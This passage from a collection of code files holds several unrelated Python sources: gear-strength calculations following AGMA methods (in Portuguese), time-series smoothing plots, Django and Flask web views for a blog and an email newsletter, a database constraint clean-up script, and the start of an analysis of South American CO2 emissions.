f'{self.K_r:.{precision}f}',\r\n f'{self.C_H:.{precision}f}',\r\n f'{self.Z_N:.{precision}f}',\r\n f'{self.Y_lewis[\"gear\"]:.{precision}f}',\r\n f'{self.K_B:.{precision}f}'],\r\n }\r\n \r\n params_dt = pd.DataFrame.from_dict(params_dict)\r\n \r\n if latex:\r\n return params_dt.to_latex(index=False,\r\n formatters={'Parâmetros':lambda x: f'${x}$',\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return params_dt\r\n \r\n def report_stress(self,S_t,S_c,W_t,precision=2,latex=False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n S_t : TYPE\r\n DESCRIPTION.\r\n S_c : TYPE\r\n DESCRIPTION.\r\n W_t : TYPE\r\n DESCRIPTION.\r\n precision : TYPE, optional\r\n DESCRIPTION. The default is 2.\r\n latex : TYPE, optional\r\n DESCRIPTION. The default is False.\r\n\r\n Returns\r\n -------\r\n params_dt: DataFrame or String\r\n Dataframe com os dados das tensões.\r\n\r\n \"\"\"\r\n \r\n sig_Bp = f'{self.bending_stress_p(W_t):.{precision}f}'\r\n sig_Bg = f'{self.bending_stress_g(W_t):.{precision}f}'\r\n FS_Bp = f'{self.safety_bending_p(S_t, W_t):.{precision}f}'\r\n FS_Bg = f'{self.safety_bending_g(S_t, W_t):.{precision}f}'\r\n \r\n sig_Cp = f'{self.contact_stress_p(W_t):.{precision}f}'\r\n sig_Cg = f'{self.contact_stress_g(W_t):.{precision}f}'\r\n FS_Cp = f'{self.safety_contact_p(S_c, W_t):.{precision}f}'\r\n FS_Cg = f'{self.safety_contact_g(S_c, W_t):.{precision}f}'\r\n\r\n params_dict = {'Parâmetros': ['sigma_B [MPa]',\r\n 'sigma_C [MPa]',\r\n 'FS_B',\r\n 'FS_C'],\r\n 'Pinhão': [sig_Bp,\r\n sig_Cp,\r\n FS_Bp,\r\n FS_Cp],\r\n 'Coroa': [sig_Bg,\r\n sig_Cg,\r\n FS_Bg,\r\n FS_Cg]\r\n }\r\n \r\n params_dt = pd.DataFrame.from_dict(params_dict)\r\n \r\n if latex:\r\n return params_dt.to_latex(index=False,\r\n formatters={'Parâmetros':lambda x: f'${x}$'.replace('sigma','\\sigma'),\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return params_dt\r\n \r\n def report_dims(self,precision=2,latex=False):\r\n m = 1/self.P\r\n N_p = self.N_p\r\n N_g = self.N_g\r\n d_p = N_p*m\r\n d_g = N_g*m\r\n F = self.F\r\n \r\n dims_dict = {'Dimensões':['N',\r\n 'd [mm]',\r\n 'm [mm]',\r\n 'F [mm]'],\r\n 'Pinhão': [f'{N_p:.0f}',\r\n f'{d_p:.{precision}f}',\r\n f'{m:.{precision}f}',\r\n f'{F:.{precision}f}'],\r\n 'Coroa': [f'{N_g:.0f}',\r\n f'{d_g:.{precision}f}',\r\n f'{m:.{precision}f}',\r\n f'{F:.{precision}f}'],\r\n }\r\n \r\n \r\n dims_dt = pd.DataFrame.from_dict(dims_dict)\r\n \r\n if latex:\r\n return dims_dt.to_latex(index=False,\r\n formatters={'Dimensões':lambda x: f'${x}$',\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return dims_dt\r\n \r\n \r\nclass WormAGMA():\r\n def __init__(self,\r\n nw:float,\r\n dw:float,\r\n dc:float,\r\n Nw:int,\r\n Nc:int,\r\n px:float,\r\n lambd:float,\r\n casting_method:str = 'molde',\r\n **threadkwargs):\r\n \r\n \"\"\"\r\n Define os parâmetros de projeto para dimensionamento de pinhões \r\n sem-fim de acorod com a metodologia da AGMA.\r\n \r\n Parameters\r\n ----------\r\n nw : float\r\n Rotação do pinhão sem-fim em RPM.\r\n dw : float\r\n Diametro nominal do pinhão sem-fim em mm.\r\n dc : float\r\n Diametro nominal da coroa sem-fim em mm.\r\n Nw : int\r\n N° de dentes do pinhão sem-fim em mm.\r\n Nc : int\r\n N° de dentes da coroa sem-fim em mm.\r\n px: float\r\n passo axial do pinhão 
em mm\r\n lambd : float\r\n Ângulo de avanço em deg.\r\n C : float\r\n Distância entre centros em mm.\r\n casting_method : str\r\n Tipo de fundição utilizado no pinhão.\r\n Opções: molde; resfriamento; centrifugo. O padrão é 'molde'\r\n **threadkwargs: kwargs\r\n Dados de adendo (kw: a), dedendo (kw: b) e folga (kw: c) do \r\n dente do pinhão. Somente necessário se px < 4.06 mm. Por \r\n padrão adota os valores padronizados para um ângulo de pressão \r\n de 20° de filete único.\r\n \r\n Returns\r\n -------\r\n None.\r\n \r\n \"\"\"\r\n \r\n self.dw,self.dc,self.px,self.C = map(lambda x : m2ft(x,metric_unit='mm',imperial_unit='in'),\r\n [dw,dc,px,(dw+dc)/2]\r\n )\r\n \r\n self.nw = rad_velocity(nw,input_unit='RPM',output_unit='rad/s')\r\n self.lambd=np.deg2rad(lambd)\r\n \r\n self.Nw = Nw\r\n self.Nc = Nc\r\n self.mG = Nc/Nw \r\n \r\n self.Pn = self.Nc/self.dc\r\n self.Pt = self.Pn*np.cos(self.lambd)\r\n \r\n a = threadkwargs.pop('a',0.3183*self.px)\r\n b = threadkwargs.pop('b',0.3683*self.px)\r\n c = threadkwargs.pop('c',b-a)\r\n #guardados para uso em get_dims()\r\n self.a, self.b, self.c = a, b, c\r\n\r\n do = self.dw+2*a\r\n \r\n \"Largura de Face da Coroa\"\r\n #0.160 in corresponde a 4.06 mm; self.px já está em polegadas\r\n self.Fc = (1.125*np.sqrt((do+2*c)**2-(do-4*a)**2) if self.px < 0.160\r\n else 2/3*self.dw)\r\n #Não exceder valor máximo:\r\n if self.Fc > 0.67*self.dc:\r\n self.Fc = 0.67*self.dc\r\n \r\n \"Velocidade tangencial\"\r\n #self.nw está em rad/s, logo Vs [ft/min] = 60*omega*(d/2)/(12*cos(lambda))\r\n self.Vs = 60*self.nw*(self.dw/2)/(12*np.cos(self.lambd)) #ft/min\r\n \r\n \"Fator dos Materiais\"\r\n if self.C <= 3: #distância entre centros de até 3 in\r\n Cs = 720+10.37*self.C**3\r\n elif casting_method.lower() in ('molde', 'mold'):\r\n Cs = (1000 if self.dc <= 2.5\r\n else 1190 - 477*np.log10(self.dc)\r\n )\r\n elif casting_method.lower() in ('resfriamento', 'cooled'):\r\n Cs = (1000 if self.dc <= 8\r\n else 1412 - 456*np.log10(self.dc)\r\n )\r\n elif casting_method.replace('í','i').lower() in ('centrifugo', 'centrifugal'):\r\n Cs = (1000 if self.dc <= 25\r\n else 1251 - 180*np.log10(self.dc)\r\n )\r\n else:\r\n raise ValueError('casting_method desconhecido: ' + casting_method)\r\n \r\n self.Cs = Cs\r\n \r\n \"Fator de correção de razão\"\r\n if self.mG < 3:\r\n print(f'A razão de engrenamento Nc/Nw deve ser maior que 3. Recebido: {self.mG:.1f}')\r\n \r\n \r\n self.Cm = (0.02*np.sqrt(-self.mG**2+40*self.mG-76) + 0.46 if 3 < self.mG <= 20\r\n else 0.0107*np.sqrt(-self.mG**2+56*self.mG+5145) if 20 < self.mG <= 76\r\n else 1.1483-0.00658*self.mG)\r\n \r\n \"Fator de velocidade\"\r\n self.Cv = (0.659*np.exp(-0.0011*self.Vs) if self.Vs < 700\r\n else 13.31*self.Vs**(-0.571) if 700 <= self.Vs < 3000\r\n else 65.52*self.Vs**(-0.774)\r\n )\r\n \r\n \r\n def Wadm(self,E=303,unit='N',FS=1.5):\r\n \"\"\"\r\n Calcula a força tangencial admissível no dente da coroa (componente mais crítico)\r\n a partir do método AGMA, corrigido pela razão entre os módulos de elasticidade\r\n do material adotado e a liga de bronze adotada pela AGMA para o dimensionamento\r\n de sistemas de engrenamento sem-fim.\r\n\r\n Parameters\r\n ----------\r\n \r\n E : float\r\n Módulo de Young do material em MPa. O padrão é 303, idêntico à liga\r\n de alumínio-bronze considerada para os cálculos padrões da AGMA.\r\n unit : str, optional\r\n Define a unidade desejada da força no output. The default is 'N'.\r\n FS : float, optional\r\n Fator de segurança para contabilizar parâmetros não previstos nos \r\n efeitos da mudança de material. The default is 1.5.\r\n\r\n Returns\r\n -------\r\n float\r\n Força tangencial admissível na unidade especificada.\r\n\r\n \"\"\"\r\n E_bronze = 303 #MPa, módulo de elasticidade da liga de bronze-alumínio utilizada no cálculo da AGMA\r\n E_ratio = E/(E_bronze*FS)\r\n \r\n W = self.Cs*(self.dc**0.8)*self.Fc*self.Cm*self.Cv*E_ratio\r\n \r\n \r\n\r\n if unit == 'lbf':\r\n return W\r\n \r\n else:\r\n return lbf2N(W,metric_unit=unit)\r\n \r\n \r\n def get_params(self):\r\n \"\"\"\r\n Gera dicionário com os parâmetros de correção do método AGMA.\r\n\r\n Returns\r\n -------\r\n params_dict : dict\r\n Dicionário com os parâmetros de correção do método AGMA.\r\n\r\n \"\"\"\r\n \r\n params_dict = {'C_s':self.Cs,\r\n 'C_m':self.Cm,\r\n 'C_v':self.Cv,\r\n 'Vs':self.Vs\r\n }\r\n \r\n \r\n return params_dict\r\n \r\n def get_dims(self):\r\n \"\"\"\r\n Gera dicionário com os parâmetros dimensionais do engrenamento\r\n\r\n Returns\r\n -------\r\n params_dict : dict\r\n Dicionário com os parâmetros dimensionais do engrenamento.\r\n\r\n \"\"\"\r\n params_dict = {'a':self.a,\r\n 'b':self.b,\r\n 'c':self.c,\r\n 'lambda':self.lambd,\r\n 'Pn':self.Pn,\r\n 'Pt':self.Pt}\r\n \r\n \r\n return params_dict\r\n\r\n \r\n\r\n","repo_name":"valtervg13/MechPy","sub_path":"MechPy/ComponentDesign/Gears.py","file_name":"Gears.py","file_ext":"py","file_size_in_byte":49219,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
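A hedged usage sketch for the gear record above; the import path, numeric values and units below are illustrative assumptions rather than anything taken from the source:

    # Exemplo hipotético de uso da classe WormAGMA (valores apenas ilustrativos)
    from MechPy.ComponentDesign.Gears import WormAGMA
    worm = WormAGMA(nw=1750, dw=50, dc=200, Nw=2, Nc=40, px=12, lambd=8,
                    casting_method='molde')
    print(worm.get_params())             # fatores de correção Cs, Cm, Cv e Vs
    print(worm.Wadm(E=303, unit='N'))    # força tangencial admissível em N

The same pattern applies to SpurAGMA: construct the object with the full geometry, then query bending_stress_p/contact_stress_p and the safety_* methods using the transverse load obtained from Wt_from_H.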
{"seq_id":"14392081700","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport ts_functions as ts\n\ndata = pd.read_csv('../Dataset/deaths_pt.csv', index_col='start_date', sep=',', decimal='.',\n parse_dates=True, infer_datetime_format=True)\ndata = data.sort_values(by='start_date')\n\ngraphsDir = './Results/Transformation/Smoothing/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Smoothing')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT/2))\nts.plot_series(data, x_label='start_date', y_label='deaths', title='DEATHS original')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - win_size = 10')\nplt.savefig(graphsDir + 'Deaths - win_size = 10')\n\nWIN_SIZE = 100\nrolling = data.rolling(window=WIN_SIZE)\nsmooth_df = rolling.mean()\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT/2))\nts.plot_series(smooth_df, title=f'Smoothing (win_size={WIN_SIZE})', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - win_size = 100')\nplt.savefig(graphsDir + 'Deaths - win_size = 100')\n\n\ngraphsDir = './Results/Transformation/Aggregation/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Aggregation')\n\ndef aggregate_by(data: pd.Series, index_var: str, period: str, title: str = '', x_label: str = '', y_label: str = ''):\n index = data.index.to_period(period)\n agg_df = data.copy().groupby(index).mean()\n agg_df[index_var] = index.drop_duplicates().to_timestamp()\n agg_df.set_index(index_var, drop=True, inplace=True)\n ts.plot_series(agg_df, title=title, x_label=x_label, y_label=y_label)\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'D', title='Daily deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Daily')\nplt.savefig(graphsDir + 'Deaths - Daily')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'W', title='Weekly deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - 
Weekly')\nplt.savefig(graphsDir + 'Deaths - Weekly')\n\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\naggregate_by(data, 'start_date', 'M', title='Monthly deaths', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Monthly')\nplt.savefig(graphsDir + 'Deaths - Monthly')\n\n\ngraphsDir = './Results/Transformation/Differentiation/'\nif not os.path.exists(graphsDir):\n os.makedirs(graphsDir)\n\nprint('Deaths - Differentiation')\n\ndiff_df = data.diff()\nplt.figure(figsize=(3*ts.HEIGHT, ts.HEIGHT))\nts.plot_series(diff_df, title='Differentiation', x_label='start_date', y_label='deaths')\nplt.xticks(rotation = 45)\nplt.suptitle('Deaths - Differentiation')\nplt.savefig(graphsDir + 'Deaths - Differentiation')\n\nprint('Deaths - Change of Space - TODO')\n","repo_name":"isabelSoares/CD-2021","sub_path":"Last_Labs/deaths_transformation.py","file_name":"deaths_transformation.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36260506642","text":"from authentications.utils import get_correlation_id_from_username, check_permissions_by_user\nfrom web_admin import setup_logger, api_settings\nfrom web_admin.restful_client import RestFulClient\nfrom django.views.generic.base import TemplateView\nfrom web_admin.get_header_mixins import GetHeaderMixin\nfrom django.conf import settings\nfrom django.shortcuts import render\nimport logging\nfrom braces.views import GroupRequiredMixin\nfrom authentications.apps import InvalidAccessToken\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CardProviderList(GroupRequiredMixin, TemplateView, GetHeaderMixin):\n group_required = \"SYS_VIEW_LIST_PROVIDER\"\n template_name = \"card_provider/card_provider.html\"\n url = api_settings.SEARCH_CARD_PROVIDER\n logger = logger\n login_url = 'web:permission_denied'\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(CardProviderList, self).dispatch(request, *args, **kwargs)\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def post(self, request, *args, **kwargs):\n self.logger.info('========== Start get card provider list ==========')\n context = super(CardProviderList, self).get_context_data(**kwargs)\n provider_name = request.POST.get('provider_name')\n params = {}\n if provider_name:\n params['name'] = provider_name\n self.logger.info('Params: {}'.format(params))\n is_success, status_code, status_message, data = RestFulClient.post(url=self.url,\n headers=self._get_headers(),\n loggers=self.logger,\n timeout=settings.GLOBAL_TIMEOUT,\n params=params)\n if not is_success:\n if status_code in [\"access_token_expire\", 'authentication_fail', 'invalid_access_token']:\n self.logger.info(\"{}\".format(status_message))\n raise InvalidAccessToken(status_message)\n self.logger.info('Response_content_count: {}'.format(len(data)))\n is_permission_detail = check_permissions_by_user(self.request.user, 'SYS_VIEW_DETAIL_PROVIDER')\n is_permission_edit = check_permissions_by_user(self.request.user, 'SYS_EDIT_PROVIDER')\n\n for i in data:\n i['is_permission_detail'] = is_permission_detail\n i['is_permission_edit'] = is_permission_edit\n\n context.update({\n 'data': 
data,\n 'provider_name': provider_name\n })\n self.logger.info('========== Finish get card provider list ==========')\n\n return render(request, self.template_name, context)\n\n","repo_name":"thol-voleak/ami-kh-devops_python","sub_path":"web_admin/card_provider/views/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28848921933","text":"from flask import (\n render_template,\n request,\n Blueprint,\n g,\n current_app,\n)\nfrom marshmallow import ValidationError, EXCLUDE\nfrom flask_jwt_extended import (\n get_jwt_identity,\n jwt_required,\n jwt_optional,\n)\nfrom app.model.email import (\n EmailModel,\n EmailSchema,\n Email_subscribe_log,\n Email_unsubscribe_log,\n)\nfrom app.model.article import (\n Article_tag_schema,\n)\nfrom app.views.abort_msg import abort_msg\nfrom app.views.celery_tasks.tasks import send_mail_now_task, send_check_mail\n\nemail = Blueprint(\"email\", __name__)\nemail_schema = EmailSchema()\narticle_tag_schema = Article_tag_schema()\n\n\n# Subscribe Email\n@email.route(\"/subscribe\", methods=[\"GET\", \"POST\"])\n@jwt_optional\ndef subscribe():\n # Submit Result Page\n if request.method == \"GET\":\n # Validate\n data = get_jwt_identity()\n if data:\n EmailModel.subscribe(data)\n Email_subscribe_log.subscribe(data)\n return render_template(\n \"/email/submit_result_success.html\", result_type=\"Register success\"\n )\n\n # Send Submit Mail work\n if request.method == \"POST\":\n try:\n # Validate\n data = request.json\n data_valide = email_schema.load(data, unknown=EXCLUDE)\n # Check Mail exist or not\n if EmailModel.get_by_email(data_valide[\"email\"]):\n return {\"message\": \"already\"}, 200\n else:\n lang = g.get(\"lang_code\")\n send_check_mail.delay(data_valide[\"email\"], lang)\n return {\"message\": \"send\"}, 200\n\n except ValidationError as error:\n current_app.logger.error(error.messages)\n return {\"errors\": error.messages}, 400\n\n except Exception as e:\n current_app.logger.error(abort_msg(e))\n return {\"errors\": abort_msg(e)}, 422\n\n\n# Unsubscribe Email\n@email.route(\"/unsubscribe\", methods=[\"GET\"])\n@jwt_required\ndef unsubscribe():\n data = get_jwt_identity()\n if data:\n EmailModel.unsubscribe(data)\n Email_unsubscribe_log.unsubscribe(data)\n return render_template(\n \"/email/submit_result_success.html\", result_type=\"Unsubscribe success\"\n )\n\n\n# Testing Email\n@email.route(\"/\")\ndef test():\n data = request.values\n if data:\n send_mail_now_task.delay(data[\"email\"])\n else:\n send_mail_now_task.delay()\n return \"666\"\n","repo_name":"hsuanchi/Max-Newsletter","sub_path":"flask/app/views/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"34912397085","text":"import psycopg2\n\nconn = psycopg2.connect(database=\"bdalmacen\", user=\"\", password=\"\", host=\"localhost\", port=\"5432\")\n\nif conn == None:\n print('Error de conexion con la base de datos')\n exit()\n\ncur = conn.cursor()\nsql = \"SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname != 'pg_catalog' AND schemaname != 'information_schema'\"\ncur.execute(sql)\ntablas = []\n\nfor row in cur.fetchall():\n tablas.append(row[0])\n\nfks_incorrectas = []\n\nfor tabla in tablas:\n sql = f\"SELECT con.conname FROM pg_catalog.pg_constraint con INNER JOIN pg_catalog.pg_class rel ON rel.oid = con.conrelid INNER 
JOIN pg_catalog.pg_namespace nsp ON nsp.oid = connamespace WHERE nsp.nspname = 'public' AND rel.relname = '{tabla}'\"\n cur.execute(sql)\n\n for row in cur.fetchall():\n if '0' in row[0] or '1' in row[0] or '2' in row[0] or '3' in row[0] or '4' in row[0] or '5' in row[0] or '6' in row[0] or '7' in row[0] or '8' in row[0] or '9' in row[0]:\n fks_incorrectas.append((tabla, row[0]))\n\nfor tabla, fk in fks_incorrectas:\n sql = f\"ALTER TABLE {tabla} DROP CONSTRAINT {fk}\"\n cur.execute(sql)\n conn.commit()\n\ncur.close()\nconn.close()\n\nprint('Exito')","repo_name":"evero91/migracion-postgres","sub_path":"fk_fix.py","file_name":"fk_fix.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40954545969","text":"from django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom .forms import PostForm, CommentForm\nfrom .models import Group, Post, User, Follow\n\n\ndef pagination(request, posts):\n paginator = Paginator(posts, settings.POSTS_PER_PAGE)\n page_number = request.GET.get('page')\n return paginator.get_page(page_number)\n\n\ndef index(request):\n posts = Post.objects.all()\n context = {\n 'page_obj': pagination(request, posts),\n }\n return render(request, 'posts/index.html', context)\n\n\ndef group_posts(request, slug):\n group = get_object_or_404(Group, slug=slug)\n posts = group.posts.all()\n context = {\n 'group': group,\n 'page_obj': pagination(request, posts),\n }\n return render(request, 'posts/group_list.html', context)\n\n\ndef profile(request, username):\n user_obj = get_object_or_404(User, username=username)\n posts = user_obj.posts.all()\n posts_number = posts.count()\n following = (request.user.is_authenticated\n and Follow.objects.filter(\n user=request.user,\n author=user_obj).exists())\n context = {\n 'username': user_obj,\n 'posts_number': posts_number,\n 'page_obj': pagination(request, posts),\n 'following': following\n }\n return render(request, 'posts/profile.html', context)\n\n\ndef post_detail(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n comments = post.comments.all()\n author = post.author\n posts_number = author.posts.all().count()\n form = CommentForm()\n context = {\n 'author': author,\n 'post': post,\n 'posts_number': posts_number,\n 'form': form,\n 'comments': comments\n }\n return render(request, 'posts/post_detail.html', context)\n\n\n@login_required\ndef post_create(request):\n form = PostForm(request.POST or None,\n files=request.FILES or None)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n form.save()\n return redirect('posts:profile', post.author.username)\n form = PostForm()\n return render(\n request,\n 'posts/create_post.html',\n {\n 'form': form,\n 'is_edit': False})\n\n\n@login_required\ndef post_edit(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n if request.user != post.author:\n return redirect('posts:post_detail', post_id=post_id)\n form = PostForm(\n request.POST or None,\n files=request.FILES or None,\n instance=post\n )\n if form.is_valid():\n form.save()\n return redirect('posts:post_detail', post_id=post_id)\n form = PostForm(request.POST, instance=post)\n return render(\n request,\n 'posts/create_post.html',\n {'form': form,\n 'is_edit': True})\n\n\n@login_required\ndef add_comment(request, post_id):\n post = 
get_object_or_404(Post, pk=post_id)\n form = CommentForm(request.POST or None)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.post = post\n comment.save()\n return redirect('posts:post_detail', post_id=post_id)\n\n\n@login_required\ndef follow_index(request):\n user = request.user\n posts = Post.objects.filter(author__following__user=user).all()\n context = {\n 'page_obj': pagination(request, posts)\n }\n return render(request, 'posts/follow.html', context)\n\n\n@login_required\ndef profile_follow(request, username):\n user = request.user\n user_to_follow = get_object_or_404(User, username=username)\n if user != user_to_follow:\n obj, created = Follow.objects.get_or_create(\n user=user,\n author=user_to_follow)\n return redirect('posts:profile', username=user_to_follow)\n\n\n@login_required\ndef profile_unfollow(request, username):\n # Дизлайк, отписка\n user = request.user\n user_to_follow = get_object_or_404(User, username=username)\n if user != user_to_follow:\n Follow.objects.filter(user=user, author=user_to_follow).delete()\n return redirect('posts:profile', username=user_to_follow)\n","repo_name":"IuriyLeb/yatube_final","sub_path":"yatube/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34623049839","text":"\"\"\" Assignment 2 \"\"\"\r\n\r\n# libraries - general\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np \r\nimport pandas as pd\r\n\r\n# libraries - statistics\r\nfrom scipy import interpolate\r\nfrom scipy import stats\r\nfrom scipy.stats import kurtosis, skew\r\nfrom scipy.stats import shapiro\r\n\r\n# libraries - trying new things\r\nimport pycountry_convert as pc\r\nfrom pycountry_convert import country_alpha2_to_continent_code, country_name_to_country_alpha2\r\n\r\n\r\n\"\"\" Functions for Data Pre-Processing \"\"\"\r\n\r\n# data pre-processing function \r\ndef pre_processing(x):\r\n '''\r\n Parameters\r\n ----------\r\n x : dataset, performing functions described below on the dataset\r\n Returns\r\n -------\r\n the column values with ',' replaced and \r\n stored as an int value\r\n '''\r\n head = x.head() # displaying the first 5 lines in the data\r\n tail = x.tail() # displaying the last 5 lines in the data\r\n columns = x.columns # name of columns in dataset\r\n describe = x.describe # general statistics on the dataset \r\n info = x.info # general statistics on the dataset \r\n null = x.isna().sum() # any nan values in columns of dataset\r\n dtype = x.dtypes # data types of the columns in the dataset\r\n index = x.index # the row identifirs\r\n \r\n return (f'The top 5 columns in the dataset = \\n {head} \\n \\\r\n The bottom 5 columns in the dataset = \\n {tail} \\n \\\r\n The name of the columns in the dataset = \\n {columns} \\n \\\r\n The statistic description of the dataset = \\n {describe} \\n \\\r\n The information on the dataset = \\n {info} \\n \\\r\n The presence of any NA values = \\n {null} \\n \\\r\n The datatype of the columns in the dataset = \\n {dtype} \\n \\\r\n The index of the dataset = \\n {index}') \r\n\r\ndef data_load(x):\r\n x = input() # user would input the location of the file e.g. 
'C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total co2.csv'\r\n df = pd.read_csv(x,\r\n header = 2,\r\n engine = \"python\",\r\n dtype = \"str\")\r\n return df\r\n\r\ndef clean_convert(df, column):\r\n '''\r\n Parameters\r\n ----------\r\n df : dataframe to be manipulated\r\n column : column of the dataframe to be manipulated\r\n\r\n Returns\r\n -------\r\n df : changes the column datatype to float\r\n\r\n '''\r\n df[column] = pd.to_numeric(df[column], \r\n downcast = \"float\")\r\n return df\r\n \r\n# loading in the datasets \r\ndf = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total co2.csv',\r\n header = 2, # it removes the top line of jargon as it's not data\r\n engine = \"python\",\r\n dtype = \"str\")\r\n\r\n\r\n\"\"\" CO2 Emissions Dataset and Pre-Processing \"\"\"\r\n\r\n# performing pre-processing\r\nprint(pre_processing(df))\r\n\r\n# all data are saved as objects so need to change them to floats\r\nfor col in df.columns[4:]:\r\n df = clean_convert(df, col)\r\nprint(df.dtypes)\r\n\r\n# removing unuseful columns\r\ndf.drop(['Country Code', 'Indicator Name', 'Indicator Code', '2019', '2020', 'Unnamed: 65'],\r\n axis = 1,\r\n inplace = True)\r\n\r\n# renaming a column\r\ndf.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n\r\n\"\"\" Identifying rows to use for South America analysis \"\"\"\r\n\r\nsa_df = df[(df['Country Name'] == 'Argentina') |\r\n (df['Country Name'] == 'Bolivia') |\r\n (df['Country Name'] == 'Brazil') |\r\n (df['Country Name'] == 'Chile') |\r\n (df['Country Name'] == 'Colombia') |\r\n (df['Country Name'] == 'Ecuador') |\r\n (df['Country Name'] == 'Guyana') |\r\n (df['Country Name'] == 'Paraguay') |\r\n (df['Country Name'] == 'Peru') |\r\n (df['Country Name'] == 'Suriname') |\r\n (df['Country Name'] == 'Uruguay') |\r\n (df['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df.reset_index(inplace = True,\r\n drop = True)\r\n\r\n\r\n\"\"\" Summary Statistics on SA Dataset \"\"\"\r\n\r\n# performing data pre-processing\r\nprint(pre_processing(sa_df))\r\n\r\n'''\r\nthere are no NA values in any of the columns/rows so no need\r\nfor interpolation, but will experiment using a new dataframe and\r\nset some of those values to be NA.\r\nthis function contains the sub-functions: describe and info\r\n'''\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA CO2 dataset \"\"\"\r\n\r\nfrom scipy.stats import shapiro\r\n\r\n# performing shapiro-wilk test\r\nshapiro_test = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(shapiro_test)\r\n\r\n'''\r\nCountries accepting the null hypothesis: Guyana, Uruguay, and Colombia\r\n(countries are normally distributed across the years)\r\n\r\nCountries rejecting the null hypothesis: the rest\r\n(countries are not normally distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA CO2 dataset \"\"\"\r\n\r\n# performing skewness and kurtosis tests\r\nskewness_test1 = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test1 = (sa_df.groupby('Country Name')\r\n .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test1, '\\n', \r\n kurtosis_test1)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\nsa_box = sa_df.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_box.reset_index(level = 0,\r\n inplace = 
